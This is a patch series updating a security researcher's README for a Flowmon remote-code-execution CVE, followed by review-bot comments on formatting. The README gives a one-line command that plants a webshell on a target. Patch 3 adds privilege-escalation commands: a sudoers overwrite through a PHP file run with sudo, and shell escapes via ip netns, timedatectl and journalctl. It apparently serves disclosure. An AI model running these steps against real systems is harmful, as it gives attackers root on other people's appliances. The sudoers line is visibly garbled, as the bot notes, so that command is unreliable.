From 8b8f155b45962d1dad60d42073d6b16c078b1f33 Mon Sep 17 00:00:00 2001 From: Dave Yesland <41924355+DaveYesland@users.noreply.github.com> Date: Tue, 23 Apr 2024 06:59:26 -0700 Subject: [PATCH 1/3] Update README.md --- CVE-2024-2389/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/CVE-2024-2389/README.md b/CVE-2024-2389/README.md index 9f3749a..6346c1b 100644 --- a/CVE-2024-2389/README.md +++ b/CVE-2024-2389/README.md @@ -22,4 +22,4 @@ To write a simple webshell: Then visit TARGET/rce.php ### Screenshot -![Alt-text that shows up on hover](poc_image.png) \ No newline at end of file +![poc_image](https://github.com/RhinoSecurityLabs/CVEs/assets/41924355/56e95c42-3541-4768-862d-7d272db6ee8f) From b080ab1e70184fa57a6e03f0c0abb5044d1c6b2d Mon Sep 17 00:00:00 2001 From: Dave Yesland <41924355+DaveYesland@users.noreply.github.com> Date: Tue, 23 Apr 2024 06:59:40 -0700 Subject: [PATCH 2/3] Delete CVE-2024-2389/poc_image.png --- CVE-2024-2389/poc_image.png | 1 - 1 file changed, 1 deletion(-) delete mode 100644 CVE-2024-2389/poc_image.png diff --git a/CVE-2024-2389/poc_image.png b/CVE-2024-2389/poc_image.png deleted file mode 100644 index 4a17b1e..0000000 --- a/CVE-2024-2389/poc_image.png +++ /dev/null @@ -1 +0,0 @@ -This should be an image showing the successful exploit \ No newline at end of file From c8b5df5428517c20acfaf1deed35b9c966adba6c Mon Sep 17 00:00:00 2001 From: Dave Yesland <41924355+DaveYesland@users.noreply.github.com> Date: Tue, 23 Apr 2024 07:08:08 -0700 Subject: [PATCH 3/3] Update README.md --- CVE-2024-2389/README.md | 25 ++++++++++++++++++++++++- 1 file changed, 24 insertions(+), 1 deletion(-) diff --git a/CVE-2024-2389/README.md b/CVE-2024-2389/README.md index 6346c1b..70b55de 100644 --- a/CVE-2024-2389/README.md +++ b/CVE-2024-2389/README.md 
@@ -5,7 +5,7 @@ **Versions Affected:** Tested on v12.03.02 **Version Fixed:** 12.3.5/11.1.14 **Researcher:** Dave Yesland (https://x.com/daveysec) -**Disclosure Link:** https://rhinosecuritylabs.com/ +**Disclosure Link:** https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/ **NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2024-2389 **Vendor Advisory:** https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability @@ -21,5 +21,28 @@ To write a simple webshell: `python3 CVE-2024-2389 --web-shell TARGET` Then visit TARGET/rce.php +A root shell can be obtained through several methods: +``` +cp /var/www/shtml/index.php /tmp/index.php.bak; +echo '> /etc/sudoers"); ?>' > /var/www/shtml/index.php; +sudo /usr/bin/php /var/www/shtml/index.php Cli\:AddNewSource s; +cp /tmp/index.php.bak /var/www/shtml/index.php; + +# ip command: +sudo ip netns add foo +sudo ip netns exec foo /bin/ln -s /proc/1/ns/net /var/run/netns/bar +sudo ip netns exec bar /bin/bash +sudo ip netns delete foo +sudo ip netns delete bar + +# Abusing the timedatectl command: +sudo timedatectl list-timezones +!/bin/bash + +#Abusing journalctl +sudo journalctl +!/bin/bash +``` + ### Screenshot ![poc_image](https://github.com/RhinoSecurityLabs/CVEs/assets/41924355/56e95c42-3541-4768-862d-7d272db6ee8f)
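Review bot: In PATCH 1/3, the replacement image line under "### Screenshot" uses `poc_image` as its alt text, which says nothing to a reader when the image does not load; describe what the screenshot shows instead. The image now lives at a github.com assets URL and PATCH 2/3 deletes the in-repo placeholder, so clones and offline copies of the README have no screenshot. Committing the actual PNG next to the README would keep the two together.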
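Review bot: In PATCH 3/3, the metadata hunk (@@ -5,7 +5,7 @@) writes versions in two formats in the lines around the changed link: `v12.03.02` under "Versions Affected" and `12.3.5/11.1.14` under "Version Fixed". Use one format so a reader can compare both against an installed version. "Tested on v12.03.02" names only a single build; if the linked vendor advisory gives an affected range, state it here as well.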
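Review bot: In PATCH 3/3, the added root-shell block (@@ -21,5 +21,28 @@), the second line of the first method, `echo '> /etc/sudoers"); ?>' > /var/www/shtml/index.php;`, is not well-formed PHP as written: the `");` and `?>` close a call and a tag that never open, so part of the line appears to have been lost. Check the README source and how it renders. The first method also has no `#` label while the other three do, `#Abusing journalctl` is missing the space the other labels use, and the fence carries no language tag. It would help administrators auditing a host if the block stated which sudo rules each method relies on. The first method restores index.php from /tmp/index.php.bak, but nothing in these lines reverts what it writes to /etc/sudoers, and the README should say so.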